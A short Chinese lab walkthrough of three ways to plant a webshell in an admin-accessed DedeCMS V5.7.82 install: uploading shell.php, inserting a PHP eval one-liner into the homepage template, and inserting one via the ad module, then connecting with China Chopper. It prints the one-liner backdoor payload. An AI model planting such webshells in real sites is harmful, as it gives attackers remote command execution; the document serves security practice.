DedeCMS-V5.7.82-UTF8织梦管理系统漏洞

将靶场环境放到www目录下------访问/dedecms/uploads

安装程序 - 织梦内容管理系统 V5.7 UTF8SP2

同意协议------继续

继续

配置后------点击继续

进入后台

登录后台------填写用户名密码。

方法一:上传shell文件

后台------核心------附件管理------上传新文件。

访问/dedecms/uploads/uploads/shell.php

使用菜刀工具连接

进入了目录资源管理器

方法二:模板修改index.html

模板------默认模板管理------修改主页模板

在代码里面插入一句话木马

<?php phpinfo();@eval($_POST['cmd']);?>

保存

点击生成------更新主页html------配置一下------点击更新。

浏览------访问/dedecms/uploads/index.php

使用菜刀连接

方法三:广告模块任意命令插入shell

利用广告模块

插入一句话木马

点击代码------修改

使用菜刀连接

相关推荐
风行無痕2 小时前
Ubuntu Linux系统配置账号无密码sudo
linux·服务器·ubuntu
SZ1701102313 小时前
中继器的作用
服务器·网络·智能路由器
chenxy023 小时前
如何快速分享服务器上的文件
运维·服务器
重启就好4 小时前
【Ansible】模块详解
linux·服务器·ansible
一口一个橘子4 小时前
[ctfshow web入门] web69
前端·web安全·网络安全
毒果4 小时前
网络安全:账号密码与诈骗防范
网络·安全·web安全
SuperW5 小时前
Linxu实验五——NFS服务器
运维·服务器
promise5245 小时前
JVM之jcmd命令详解
java·linux·运维·服务器·jvm·bash·jcmd
果子⌂5 小时前
Linux系统入门第十二章 --Shell编程之正则表达式
linux·运维·服务器
海尔辛6 小时前
学习黑客5 分钟读懂Linux Filesystem Interaction Continued
linux·服务器·学习